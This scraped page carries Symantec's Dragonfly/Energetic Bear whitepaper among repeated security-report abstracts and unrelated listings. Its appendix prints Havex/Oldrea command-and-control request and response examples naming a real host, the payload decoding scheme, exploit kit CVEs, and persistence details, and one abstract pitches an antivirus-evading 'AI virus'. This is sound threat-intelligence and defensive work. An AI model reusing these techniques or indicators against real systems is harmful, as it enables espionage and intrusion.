The document summarizes a cyberespionage campaign called "Dragonfly" that targeted energy companies, mainly in Europe and the US, from 2011 onward. The attackers initially focused on defense and aviation firms before shifting to energy in 2013. They used spear phishing emails, watering hole attacks exploiting legitimate websites, and compromising software updates to install Backdoor.Oldrea and Trojan.Karagany malware. Analysis of the malware compilers suggests the attackers worked mostly Monday-Friday 9am-6pm in the UTC+4 time zone.
Imperva's ADC analyzed real-world traffic from sixty Web applications in order to identify attack patterns. The report demonstrates that, across a community of Web applications, early identification of attack sources and attack payloads can significantly improve the effectiveness of application security. Furthermore, it reduces the cost of decision making with respect to attack traffic across the community. Here's how, based on the traffic analyzed by the ADC: (1) multiple target SQL attackers generated nearly 6x their share of the population (2) multiple target comment spam attackers generated 4.3x their share of the population (3) multiple target RFI attackers generated 1.7x their share of the population (this amounted to 73% of total attacks).
The application threat landscape can be described as a cyber war. In this report, we explore the technical details of this war. This Web Application Attack Report identifies how many attacks a typical application can expect to suffer annually. In addition, it exposes which countries perpetrated the most attacks and compares application risks by industry. Most importantly, this report reveals the underlying distribution of attacks, presenting an accurate picture of today’s application threat landscape.
In the most recent Hacker Intelligence Initiative report, Imperva analyses vulnerabilities found in the SuperGlobal parameters of the PHP platform, and finds that a multi-step attack requires a multi-layered application security solution.
The FireEye Advanced Threat Report is based on research and trend analysis conducted by the FireEye Malware Intelligence Labs providing insights to the most current threat landscapes.
Imperva's ADC analyzed real-world traffic from sixty Web applications in order to identify attack patterns. The report demonstrates that, across a community of Web applications, early identification of attack sources and attack payloads can significantly improve the effectiveness of application security. Furthermore, it reduces the cost of decision making with respect to attack traffic across the community. Here's how, based on the traffic analyzed by the ADC: (1) multiple target SQL attackers generated nearly 6x their share of the population (2) multiple target comment spam attackers generated 4.3x their share of the population (3) multiple target RFI attackers generated 1.7x their share of the population (this amounted to 73% of total attacks).
The application threat landscape can be described as a cyber war. In this report, we explore the technical details of this war. This Web Application Attack Report identifies how many attacks a typical application can expect to suffer annually. In addition, it exposes which countries perpetrated the most attacks and compares application risks by industry. Most importantly, this report reveals the underlying distribution of attacks, presenting an accurate picture of today’s application threat landscape.
In the most recent Hacker Intelligence Initiative report, Imperva analyses vulnerabilities found in the SuperGlobal parameters of the PHP platform, and finds that a multi-step attack requires a multi-layered application security solution.
The FireEye Advanced Threat Report is based on research and trend analysis conducted by the FireEye Malware Intelligence Labs providing insights to the most current threat landscapes.
A Security Analysis Framework Powered by an Expert SystemCSCJournals
Today\'s IT systems are facing a major challenge in confronting the fast rate of emerging security threats. Although many security tools are being employed within organizations in order to standup to these threats, the information revealed is very inferior in providing a rich understanding to the consequences of the discovered vulnerabilities. We believe expert systems can play an important role in capturing any security expertise from various sources in order to provide the informative deductions we are looking for from the supplied inputs. Throughout this research effort, we have built the Open Security Knowledge Engineered (OpenSKE) framework (http://code.google.com/p/openske), which is a security analysis framework built around an expert system in order to reason over the security information collected from external sources. Our implementation has been published online in order to facilitate and encourage online collaboration to increase the practical research within the field of security analysis.
Create an Artificially Intelligent (AI) Computer virus , which can modify its signature to avoid detection from an Anti Virus software.
A computer virus which can stop all its infectious activities and go into the state of incubation when a full system scan is going on through an Anti Virus scan. What is the possibility of seeing such computer viruses in near future?
Invesitigation of Malware and Forensic Tools on Internet IJECEIAES
Malware is an application that is harmful to your forensic information. Basically, malware analyses is the process of analysing the behaviours of malicious code and then create signatures to detect and defend against it.Malware, such as Trojan horse, Worms and Spyware severely threatens the forensic security. This research observed that although malware and its variants may vary a lot from content signatures, they share some behaviour features at a higher level which are more precise in revealing the real intent of malware. This paper investigates the various techniques of malware behaviour extraction and analysis. In addition, we discuss the implications of malware analysis tools for malware detection based on various techniques.
Protecting the Oil and Gas Industry from Email ThreatsOPSWAT
Due to the high value of its supply chain, commodities, transactions, and intellectual property, the oil and gas industry is an ideal target for socially-engineered email attacks. Oil producers, brokers, and transporters must learn how to use preventative measures to mitigate the risks of falling prey to a spear phishing attack.
Cyberthreats broke new ground with mobile devices, while reaching deeper into social media. Online criminals also stepped up attacks via email, web and other traditional vectors.
This mid-year 2018 report provides intelligence about how attackers are targeting enterprise customers via device, network, and operating system vulnerabilities on mobile devices. Specifically, it reviews:
- Mobile device threat trends (1 of every 3 devices detect threats)
- Network attacks and rogue access points (66% of attacks are via networks)
- Cryptojacking and the impact on mobile devices
Learn the unique capabilities of using indicators to deal with the security breaches and attacks in the security information and event management space. Detect and enrich the indicators using ManageEngine Log360.
Mandiant’s annual threat report reveals key insights, statistics and case studies illustrating how the tools and tactics of advanced targeted attackers, including the Advanced Persistent Threat (APT), have evolved over the last year. The report, based on hundreds of advanced threat investigations, also shares approaches that organizations can take to improve the way they detect, respond to, and contain complex breaches. For the latest M-Trends report, https://www.fireeye.com/mtrends
Today internet security is a serious problem. For every consumer and business that is on the Internet,
viruses, worms and crackers are a few security threats. There are the obvious tools that aid information security
professionals against these problems such as anti-virus software, firewalls and intrusion detection systems, but
these systems can only react to or prevent attacks-they cannot give us information about the attacker, the tools
used or even the methods employed. Given all of these security questions honeypots are a novel approach to
network security and security research alike. It is a resource, which is intended to be attacked and compromised to
gain more information about the attacker and the used tools. It can also be deployed to attract and divert an
attacker from their real targets. Honeypots is an additional layer of security. Honeypots have the big advantage that
they do not generate false alerts as each observed traffic is suspicious, because no productive components are
running on the system. The levels of interaction determines the amount of functionality a honeypots provides that
is low and high interactions.
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack GroupSymantec
Waterbug is a cyberespionage group that uses sophisticated malware to systematically target government-related entities in a range of countries.
The group uses highly-targeted spear-phishing and watering-hole attack campaigns to target victims. The group has also been noted for its use of zero-day exploits and signing its malware with stolen certificates.
Once the group gains a foothold, it shifts focus to long-term persistent monitoring tools which can be used to exfiltrate data and provide powerful spying capabilities. Symantec has tracked the development of one such tool, Trojan.Turla, and has identified four unique variants being used in the wild.
A Security Analysis Framework Powered by an Expert SystemCSCJournals
Today\'s IT systems are facing a major challenge in confronting the fast rate of emerging security threats. Although many security tools are being employed within organizations in order to standup to these threats, the information revealed is very inferior in providing a rich understanding to the consequences of the discovered vulnerabilities. We believe expert systems can play an important role in capturing any security expertise from various sources in order to provide the informative deductions we are looking for from the supplied inputs. Throughout this research effort, we have built the Open Security Knowledge Engineered (OpenSKE) framework (http://code.google.com/p/openske), which is a security analysis framework built around an expert system in order to reason over the security information collected from external sources. Our implementation has been published online in order to facilitate and encourage online collaboration to increase the practical research within the field of security analysis.
Create an Artificially Intelligent (AI) Computer virus , which can modify its signature to avoid detection from an Anti Virus software.
A computer virus which can stop all its infectious activities and go into the state of incubation when a full system scan is going on through an Anti Virus scan. What is the possibility of seeing such computer viruses in near future?
Invesitigation of Malware and Forensic Tools on Internet IJECEIAES
Malware is an application that is harmful to your forensic information. Basically, malware analyses is the process of analysing the behaviours of malicious code and then create signatures to detect and defend against it.Malware, such as Trojan horse, Worms and Spyware severely threatens the forensic security. This research observed that although malware and its variants may vary a lot from content signatures, they share some behaviour features at a higher level which are more precise in revealing the real intent of malware. This paper investigates the various techniques of malware behaviour extraction and analysis. In addition, we discuss the implications of malware analysis tools for malware detection based on various techniques.
Protecting the Oil and Gas Industry from Email ThreatsOPSWAT
Due to the high value of its supply chain, commodities, transactions, and intellectual property, the oil and gas industry is an ideal target for socially-engineered email attacks. Oil producers, brokers, and transporters must learn how to use preventative measures to mitigate the risks of falling prey to a spear phishing attack.
Cyberthreats broke new ground with mobile devices, while reaching deeper into social media. Online criminals also stepped up attacks via email, web and other traditional vectors.
This mid-year 2018 report provides intelligence about how attackers are targeting enterprise customers via device, network, and operating system vulnerabilities on mobile devices. Specifically, it reviews:
- Mobile device threat trends (1 of every 3 devices detect threats)
- Network attacks and rogue access points (66% of attacks are via networks)
- Cryptojacking and the impact on mobile devices
Learn the unique capabilities of using indicators to deal with the security breaches and attacks in the security information and event management space. Detect and enrich the indicators using ManageEngine Log360.
Mandiant’s annual threat report reveals key insights, statistics and case studies illustrating how the tools and tactics of advanced targeted attackers, including the Advanced Persistent Threat (APT), have evolved over the last year. The report, based on hundreds of advanced threat investigations, also shares approaches that organizations can take to improve the way they detect, respond to, and contain complex breaches. For the latest M-Trends report, https://www.fireeye.com/mtrends
Today internet security is a serious problem. For every consumer and business that is on the Internet,
viruses, worms and crackers are a few security threats. There are the obvious tools that aid information security
professionals against these problems such as anti-virus software, firewalls and intrusion detection systems, but
these systems can only react to or prevent attacks-they cannot give us information about the attacker, the tools
used or even the methods employed. Given all of these security questions honeypots are a novel approach to
network security and security research alike. It is a resource, which is intended to be attacked and compromised to
gain more information about the attacker and the used tools. It can also be deployed to attract and divert an
attacker from their real targets. Honeypots is an additional layer of security. Honeypots have the big advantage that
they do not generate false alerts as each observed traffic is suspicious, because no productive components are
running on the system. The levels of interaction determines the amount of functionality a honeypots provides that
is low and high interactions.
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack GroupSymantec
Waterbug is a cyberespionage group that uses sophisticated malware to systematically target government-related entities in a range of countries.
The group uses highly-targeted spear-phishing and watering-hole attack campaigns to target victims. The group has also been noted for its use of zero-day exploits and signing its malware with stolen certificates.
Once the group gains a foothold, it shifts focus to long-term persistent monitoring tools which can be used to exfiltrate data and provide powerful spying capabilities. Symantec has tracked the development of one such tool, Trojan.Turla, and has identified four unique variants being used in the wild.
Countering the Advanced Persistent Threat Challenge with Deep DiscoveryTrend Micro
Targeted attacks and advanced persistent threats (APTs) are becoming the new norm of cyber security threats— encompassing organized, focused efforts that are custom-created to penetrate enterprises and government agencies for valuable data, trade secrets, and access to internal systems. We explore the anatomy of targeted attacks: the inner workings of the APT lifecycle, along with an in-depth overview of Trend Micro Deep Discovery advanced threat protection solution, and how it enables enterprise IT to adopt a custom defense strategy that modernizes its risk management program to defend against targeted attacks.
Welcome to the Threatsploit Report of covering some of the important cybersecurity events, incidents and exploits that occurred this month such as Application Security, Mobile App Security, Network Security, Website Security, API Security, Cloud Security, Host Level Security, Cyber Intelligence, Thick Client Security, Threat Vulnerability, Database Security, IOT Security, Wireless Security.
All product and company names mentioned herein are for identification and educational purposes only and are the property of, and may be trademarks of, their respective owners.
TrendLabs 2012 Annual Security Roundup: Evolved Threats in a “Post-PC” WorldInfinigate Group
Experts have been predicting the coming “post PC” era for a few
years. So the question has been, “when will we know that it’s
really here?” A simple answer is, we’ll know it’s really here when
cybercriminals move beyond the PC. By that measure, 2012 is truly
the year we entered the post-PC era as cybercriminals moved to
embrace Android, social media platforms, and even Macs with their
attacks.
READING HEAD GROUP 2 BLACK ENERGYGroup 2 Black Energy.docxsodhi3
READING HEAD: GROUP 2: BLACK ENERGY
Group 2: Black Energy
Group 2: BlackEnergy
ISOL 632 – Business Continuity Planning and Disaster Recovery Planning
University of the Cumberlands - Summer 2018
Professor: Dr. Mary R. Lind, Ph.D.
Group 2 Members:
Mirza Mohammed Omer Baig
Jaipal Reddy Goli
Swetha Kancharla
Pradeep Kumar Kasibhotla
Viran Kumar Kepa
Yousaf Khalid
Vijender Reddy Surukanti
Dheeraj Reddy Thatipally
Sasi Dhar Reddy Tippireddygari
Attack Summary:
BlackEnergy was used in sabotaging the power industry of Ukraine right around the Christmas time. BlackEnergy is a type of Trojan Virus which infects the computer systems and disrupts the functionality in different ways. This incident resulted in the outage of electricity in the Southern part of Ukraine, by disrupting the country’s power grid (Robert & Anton, 2016). Hackers used this black energy tool to spread the malware named KillDisk as well.
The understanding we had about Black Energy before starting the paper is, it is some kind of malware which spreads around the computer systems and causes DDoS attacks. Jeopardizes the security features of the machine and opens up a back channel for malicious connections to gain control of the device.
Like any other attack, first, the attacker chooses a target system and tries to infect it with the malware. Any infrastructure is as strong as its weakest component. This is well illustrated in the cyber-attacks, as attackers always identify and target the weakest component of the computer farm. Upon successful intrusion, the installation of malware will be executed (Thomas, 2016). To do this, the attackers may choose the documents or applications to disguise the malware as a harmless product. BlackEnergy used Microsoft documents as a carrier of malware and Spear phishing technique was used in the Ukraine Power plant attacks, where employees received attachments containing malware (Khan, Maynard, McLaughlin, Laverty, & Sezer, 2016). Once the documents are accessed by the employees, malware asks for enabling the macros. Enabling the macros sabotages the security controls of the computer which will later be used to gain unauthorized access by the attacker. After this, the attacker will make the necessary changes needed for the attack and prepares the system for the attack. The malicious software at this point, tries to impersonate as a genuine software and attempts to conceal itself from the anti-virus software and tries to spread around (Kurt & Maria, 2014). Once after the necessary groundwork is done, the attacker chooses a time to destroy the system’s functionality, resulting in the disruption of its services. In the Ukraine Power grid attack, the attacker chose to disrupt the services just two days before Christmas, thereby making it the most significant attack using Black energy as the tool (Richard, 2015).
Industrial Control Systems (ICS) functionality was compromised by the attack, and the attacker was able to override them and cause an ...
All information, data, and material contained, presented, or provided on is for educational purposes only.
Company names mentioned herein are the property of, and may be trademarks of, their respective owners.
It is not to be construed or intended as providing legal advice.
Company names mentioned herein are the property of, and may be trademarks of, their respective owners and are for educational purposes only.
17 U.S. Code § 107 - Limitations on exclusive rights: Fair use
Notwithstanding the provisions of sections 106 and 106A, the fair use of a copyrighted work, including such use by reproduction in copies or phonorecords or by any other means specified by that section, for purposes such as criticism, comment, news reporting, teaching (including multiple copies for classroom use), scholarship, or research, is not an infringement of copyright.
The following report from IBM explores the latest Security trends—from malware delivery to mobile device risks—based on 2013 year-end data and ongoing research.
Ransomware- A reality check (Part 1).pptxInfosectrain3
Ransomware is the type of malicious software or malware that prevents you from accessing your files, networks, or systems. They demand a ransom amount to get your access back.
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBrad Spiegel Macon GA
Brad Spiegel Macon GA’s journey exemplifies the profound impact that one individual can have on their community. Through his unwavering dedication to digital inclusion, he’s not only bridging the gap in Macon but also setting an example for others to follow.
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC
Ellisha Heppner, Grant Management Lead, presented an update on APNIC Foundation to the PNG DNS Forum held from 6 to 10 May, 2024 in Port Moresby, Papua New Guinea.
This 7-second Brain Wave Ritual Attracts Money To You.!nirahealhty
Discover the power of a simple 7-second brain wave ritual that can attract wealth and abundance into your life. By tapping into specific brain frequencies, this technique helps you manifest financial success effortlessly. Ready to transform your financial future? Try this powerful ritual and start attracting money today!
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfFlorence Consulting
Quattordicesimo Meetup di Milano, tenutosi a Milano il 23 Maggio 2024 dalle ore 17:00 alle ore 18:30 in presenza e da remoto.
Abbiamo parlato di come Axpo Italia S.p.A. ha ridotto il technical debt migrando le proprie APIs da Mule 3.9 a Mule 4.4 passando anche da on-premises a CloudHub 1.0.
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
Italy Agriculture Equipment Market Outlook to 2027harveenkaur52
Agriculture and Animal Care
Ken Research has an expertise in Agriculture and Animal Care sector and offer vast collection of information related to all major aspects such as Agriculture equipment, Crop Protection, Seed, Agriculture Chemical, Fertilizers, Protected Cultivators, Palm Oil, Hybrid Seed, Animal Feed additives and many more.
Our continuous study and findings in agriculture sector provide better insights to companies dealing with related product and services, government and agriculture associations, researchers and students to well understand the present and expected scenario.
Our Animal care category provides solutions on Animal Healthcare and related products and services, including, animal feed additives, vaccination
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
1. SECURITY RESPONSE
Dragonfly initially targeted defense and aviation companies
in the US and Canada before shifting its focus to US and
European energy firms in early 2013.
Dragonfly: Cyberespionage Attacks
Against Energy Suppliers
Symantec Security Response
Version 1.21: July 7, 2014, 12:00 GMT
3. A cyberespionage campaign against a range of targets, mainly in the energy sector, gave
attackers the ability to mount sabotage operations against their victims. The attackers,
known to Symantec as Dragonfly, managed to compromise a number of strategically
important organizations for spying purposes and, if they had used the sabotage capabilities
open to them, could have caused damage or disruption to the energy supply in the affected
countries.
The Dragonfly group, which is also known by other vendors as Energetic Bear, are a capable
group who are evolving over time and targeting primarily the energy sector and related
industries. They have been in operation since at least 2011 but may have been active even
longer than that. Dragonfly initially targeted defense and aviation companies in the US
and Canada before shifting its focus to US and European energy firms in early 2013. More
recent targets have included companies related to industrial control systems.
Dragonfly has used spam email campaigns and watering hole attacks to infect targeted
organizations. The group has used two main malware tools: Trojan.Karagany and
Backdoor.Oldrea. The latter appears to be a custom piece of malware, either written by
or for the attackers.
OVERVIEW
4. A newer approach
used by the attackers
involves
compromising the
update site for several
industrial control
system (ICS) software
producers.
TIMELINE
5. Page 5
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Timeline
Symantec observed spear phishing attempts in the form of emails with PDF attachments from February 2013
to June 2013. The email topics were related to office administration issues such as dealing with an account or
problems with a delivery. Identified targets of this campaign were mainly US and UK organizations within the
energy sector.
In May 2013, the attackers began to use the Lightsout exploit kit as an attack vector, redirecting targets from
various websites. The use of the Lightsout exploit kit has continued to date, albeit intermittently. The exploit kit
has been upgraded over time with obfuscation techniques. The updated version of Lightsout became known as
the Hello exploit kit.
A newer approach used by the attackers involves compromising the update site for several industrial control
system (ICS) software producers. They then bundle Backdoor.Oldrea with a legitimate update of the affected
software. To date, three ICS software producers are known to have been compromised.
The Dragonfly attackers used hacked websites to host command-and-control (C&C) software.
Compromised websites appear to consistently use some form of content management system.
Victims
The current targets of the Dragonfly group,
based on compromised websites and hijacked
software updates, are the energy sector and
industrial control systems, particularly those
based in Europe. While the majority of victims
are located in the US, these appear to mostly
be collateral damage. That is, many of these
computers were likely infected either through
watering hole attacks or update hijacks and
are of no interest to the attacker.
By examining victims with active infections –
where additional malicious activity has been
detected – it is possible to gather a more
accurate picture of ‘true’ victims.
The most active infections, as in Figure 2, are
Figure 1. Timeline of Dragonfly operations
Figure 2. Top 10 countries by active infection
6. Page 6
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
in Spain, followed in order by the US, France, Italy, and Germany.
Tools and tactics
Dragonfly uses two main pieces of malware in its attacks. Both are Remote Access Tool (RAT) type malware
which provide the attackers with access and control of compromised computers. Dragonfly’s favored malware
tool is Backdoor.Oldrea, which is also known as Havex or the Energetic Bear RAT. Oldrea acts as a back door for
the attackers on to the victim’s computer, allowing them to extract data and install further malware.
Oldrea appears to be custom malware, either written by the group itself or created for it. This provides some
indication of the capabilities and resources behind the Dragonfly group. The second main tool used by Dragonfly
is Trojan.Karagany. Unlike Oldrea, Karagany was available on the underground market. The source code for
version 1 of Karagany was leaked in 2010. Symantec believes that Dragonfly may have taken this source code
and modified for its own use.
Symantec found that the majority of computers compromised by the attackers were infected with Oldrea.
Karagany was only used in around 5 percent of infections. The two pieces of malware are similar in functionality
and what prompts the attackers to choose one tool over another remains unknown.
Spam campaign
The Dragonfly group has
used at least three infection
tactics against targets in the
energy sector. The earliest
method was an email spear
phishing campaign, which saw
selected executives and senior
employees in target companies
receive emails containing a
malicious PDF attachment.
Infected emails had one of two
subject lines: “The account”
or “Settlement of delivery
problem”. All of the emails were
from a single Gmail address.
Figure 3 displays the number of
different recipients per day.
The spam campaign began in
February 2013 and continued
into June 2013. Symantec
identified seven different
organizations targeted in this
campaign. At least one organization was attacked intermittently for a period of 84 days.
Watering hole attacks
In June 2013, the attackers shifted their focus to watering hole attacks. They compromised a number of energy-
related websites and injected an iframe into each of them. This iframe then redirected visitors to another
compromised legitimate website hosting the Lightsout exploit kit. This in turn exploited either Java or Internet
Explorer in order to drop Oldrea or Karagany on the victim’s computer. The fact that the attackers compromised
multiple legitimate websites for each stage of the operation is further evidence that the group has strong
technical capabilities.
Figure 3. Spam campaign activity from mid-February 2014 to mid-June 2013
7. Page 7
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
In September 2013,
Dragonfly began using
a new version of this
exploit kit, known as the
Hello exploit kit. The
landing page for this kit
contains JavaScript which
fingerprints the system,
identifying installed
browser plugins. The
victim is then redirected
to a URL which in turn
determines the best
exploit to use based on
the information collected.
Figure 4 shows the
compromised websites
categorized into their
respective industries.
Fifty percent of identified
targets were energy
industry related and
thirty percent were
energy control systems, as shown in Figure 4. A clear shift in the attackers targeting can be seen in March 2014
when energy control systems become the primary target.
Trojanized software
The most ambitious attack vector used by Dragonfly was the compromise of a number of legitimate software
packages. Three different ICS equipment providers were targeted and malware was inserted into the software
bundles they had made available for download on their websites.
Source time zone
Analysis of the compilation timestamps
on the malware used by the attackers
indicate that the group mostly worked
between Monday and Friday, with activity
mainly concentrated in a nine-hour period
that corresponded to a 9am to 6pm
working day in the UTC +4 time zone.
Figure 5. Number of samples compiled per hour, UTC time zone
Figure 4. Targeted industries over time
8. Page 8
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Conclusion
The Dragonfly group is technically adept and able to think strategically. Given the size of some of its targets, the
group found a “soft underbelly” by compromising their suppliers, which are invariably smaller, less protected
companies.
Figure 6. Number of samples compiled per day, UTC time zone
10. Page 10
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Appendix - Technical Description
Identification of this group is based on the use of two malware families and an exploit kit. The malware families
utilized are Backdoor.Oldrea and Trojan.Karagany. The exploit kit is known as Lightsout and/or Hello. Hello is an
updated iteration of Lightsout that the Dragonfly group began to use in September 2013.
Use of Backdoor.Oldrea appears to be limited to the Dragonfly group. In addition, specific instances of Trojan.
Karagany have been used by this group. Karagany is a Russian RAT sold on underground forums. Instances of
this malware related to the Dragonfly group are identified based on them being delivered through the Lightsout
exploit kit and also a particular packer that this group used. Symantec detects the Trojan.Karagany packer used
by this group as Trojan.Karagany!gen1.
The Lightsout exploit kit is a simple exploit kit that is consistently used to deliver primarily Backdoor.Oldrea and,
in several instances, Trojan.Karagany.
Lightsout exploit kit
A number of sites that use content
management systems were exploited and
an iframe was used in order to redirect
visitors to sites hosting the Lightsout
exploit kit.
An example of an injected iframe can be
seen in figure 7.
The exploit kit uses browser (e.g.
Internet Explorer and Firefox) and Java
exploits in order to deliver either Backdoor.Oldrea or Trojan.Karagany.
An example of the structure of the Lightsout exploit kit can be seen Table 1. Note that file names and exploits
used may vary.
In September 2013, the
Dragonfly group began
using a new version of
Lightsout, also known
as the Hello exploit kit.
The JavaScript included
in the landing page
redirects the browser
to a URL that depends
on the fonts installed
on the system, browser
add-ons, the OS version,
and the user agent. At
this point, it determines
the best exploit to
use, based on the
information provided, and generates an appropriate URL to redirect the user to the appropriate exploit/payload.
The following shows an example of such a request:
[http://]compromised.example/wp-includes/pomo/
dtsrc.php?a=[EK _ DETERMINED _ PARAMETER]
Figure 7. Example of injected iframe link
Table 1. Examples of file names for one implementation of the Lightsout exploit kit
Page Description CVE
Inden2i.php First landing page N/A
Inden2i.html Second landing page N/A
PluginDetect.js PluginDetect script N/A
Stoh.html Java 6 exploit Jar request file N/A
Stoh.jar Java 6 Exploit CVE-2012-1723
Gami.html Java 7 exploit Jar request file N/A
Gami.jar Java 7 exploit CVE-2013-2465
Tubc.html IE7 Exploit CVE-2012-4792
Negc.html IE8 Exploit CVE-2013-1347
11. Page 11
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
[EK_DETERMINED_PARAMETER] may be anything
listed in Table 2.
The parameters dwe and dwd relate to which
payload is requested for download, for example:
• When a Backdoor.Oldrea payload is requested
[EK_DETERMINED_PARAMETER] is dwd
• When a Karagany!gen1 payload is requested
[EK_DETERMINED_PARAMETER] is dwe
The values of the [EK_DETERMINED_PARAMETER]
variable may relate to the two different file types
represented by Backdoor.Oldrea and Trojan.
Karagany!gen1 payloads. Oldrea payloads are DLL
files (URLs end in “d” for DLL?) while Karagany!gen1
payloads are portable executables (URLs end in “e”
for EXE?).
Backdoor.Oldrea
At the core of Backdoor.Oldrea is a persistent component that interacts with C&C servers to download and
execute payloads. The components are downloaded by reaching out to the C&C server and performing a GET
request which returns an HTML page containing a base64 encoded string between two comments marked with
the ‘havex’ string.
Installation
File system modifications
• %Temp%qln.dbx
• %System%TMPprovider038.dll
Registry modifications
In this specific example, the ‘038’ in the file name indicates the major version number.
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun”TmProvider”
• HKEY_LOCAL_MACHINE SOFTWAREMicrosoftWindowsCurrentVersionRun”TmProvider”
• HKEY_LOCAL_MACHINE SOFTWAREMicrosoftInternet ExplorerInternetRegistry”fertger”
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerInternetRegistry
Code injection
• Backdoor.Oldrea injects code into explorer.exe.
Networking
Post infection, Backdoor.Oldrea will attempt to collect system information such as OS, user name, computer
name, country, language, nation, Internet adapter configuration information, available drives, default browser,
running processes, desktop file list, My Documents, Internet history, program files, and root of available drives.
It also collects data from Outlook (address book) and ICS related software configuration files. This data is
collected and written to a temporary file in an encrypted form before it is POST’ed to a remote C&C server. The
following are examples of a POST request and a POST response:
Table 2. Lightsout exploit kit parameters
Page Description
H2 Java Exploit (<v1.7.17)
H3 Chrome /w Java (<1.7.17)
H4 IE6 & OSVer < Vista – 6
H5 Java Exploit (<v1.7.17 & OSver < Vista)
H6 IE8 & OSVer < Vista
H7 Java Exploit (<=v1.6.32)
R2 Malicious JAR file
R7 Malicious JAR file
Dwe Malicious PE file
Dwd Malicious PE file
12. Page 12
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
POST request example:
POST /wp08/wp-includes/dtcla.php?id=285745296322896178920098FD80-20&v1=038&v2=17
0393861&q=5265882854508EFCF958F979E4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19
(KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19
Host: toons.freesexycomics.com
Content-Length: 0
Cache-Control: no-cache
POST response example:
HTTP/1.1 200 OK
Date: Wed, 22 Jan 2014 13:40:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache
9f65
<html><head><mega http-equiv=’CACHE-CONTROL’ content=’NO-CACHE’></
head><body>No data!<!--havexQlpoOTFBWSZTWWYvDI0BOsD////////////////////////////////////
/////////4oB+93VVXu69DuN7XYzds9yt49Ques
[...TRUNCATED FOR READABILITY]
+yUW3zfTxWAOstsCwCckdW5 AH5Q6vbbCu7GputPt5CSfgPCAKXcAOOICMsqliACGYEhAQT3v9eD
M92D/8XckU4UJBmLwyNA==havex--></body></head>
Various samples process the C&C responses differently.
In one example, the sample searches for the data enclosed by the tag ‘havex’. Once the data is found, it is
decoded using standard base64 + bzip2 and also a xor layer with bytes from the string 1312312. The decoded
data contains a small header followed by an executable MZ-file.
Another sample was found to use standard base64 + reverse xor + RSA-2048 for decrypting received data. The
decrypted data consists of a 6 byte command concatenated with an MZ file. The MZ file is compressed with the
lzma algorithm. RSA keys for decryption, together with other initial configuration information, are stored in the
registry in base64 form.
Payloads
This section includes information about identified payloads downloaded by Backdoor.Oldrea.
The following is a brief description of the functionality for each identified component:
• Tmpprovider is a persistent component that interacts with the C&C server (downloads and executes payloads).
• The InstallerFormDll component usually embeds another executable (DLL) in its resource section to be
loaded. The sample analyzed carried a Web browser password recovery tool originating from
http://securityxploded.com/browser-password-decryptor.php
• The RunExeCmdSingle component is a DLL file that drops and executes another executable. The export
‘runDll’ of this file is where the logic is implemented.
• DropCommandsCmd is a cleanup module, used to remove traces of itself from the infected computer.
• The GetFileCmd modules check for the existence of specific files on the infected host. The two samples look
for the ICS related software file and Outlook’s autocomplete address book file (outlook.nk2).
13. Page 13
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Trojan.Karagany
Trojan.Karagany is a back door used primarily for recon. It is designed to download and install additional files
and exfiltrate data. Samples sometimes use common binary packers such as UPX and Aspack on top of a custom
Delphi binary packer/protector for the payload. Where present in samples, the Delphi packer is configured to use
‘neosphere’ as a key to decrypt the payload.
The following is a brief overview of the functionality of Trojan.Karagany:
• Can upload, download, and execute files on the system
• Has plugin capability (may load several plugins for added functionality, such as Web injects)
• Payload is approximately 72Kb in size and is programmed in C/C++
• Contains a small embedded DLL file, which monitors WSASend and send APIs for capturing ‘Basic
Authentication’ credentials
Installation
Trojan.Karagany creates a folder in the user APPDATA directory and chooses the directory name from the
following list:
• Microsoft WCF services
• Broker services
• Flash Utilities
• Media Center Programs
• Policy Definitions
• Microsoft Web Tools
• Reference Assemblies
• Analysis Services
• InstallShield Information
• IIS SQL Server
• Diagnostics
• NTAPI Performance
• WPF Platform
It copies itself in the created directory with hidden and system attributes using a file name chosen from the
following list:
• SearchIndexer.exe
• ImeBroker.exe
• fsutil.exe
• PnPutil.exe
• BdeUISrv.exe
• WinSAT.exe
• pwNative.exe
• SnippingTool.exe
• DFDWizard.exe
• PrintBrmEngine.exe
• WbemMonitor.exe
• dxpserver.exe
• PowerMng.exe
14. Page 14
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Trojan.Karagany copies itself with hidden and system attributes where it was first executed as err.log[DIGITS]. It
then copies the legitimate chkdsk utility in the installation folder using the payload file name but with a space before
the file extension. This may fool ordinary users into thinking that this folder contains a legitimate application, for
example PnPutil .exe. Trojan.Karagany!gen1 may create the following additional files in the installation folder:
• Form.api
• inact.api
• prog.cer
• Cent.api
• ie.pdb
It then creates a C:ProgramDataMailMailAggl directory as a temporary directory used for uploading files.
Trojan.Karagany then creates a link to itself in the Startup folder as an autostart when the system restarts.
Networking
Trojan.Karagany first checks for a live Internet connection by visiting Microsoft or Adobe websites. It will only reach
out to its C&C server once this check is successful.
Example HTTP Requests
Internet connection test to Microsoft
GET /en-us/default.aspx HTTP/1.1
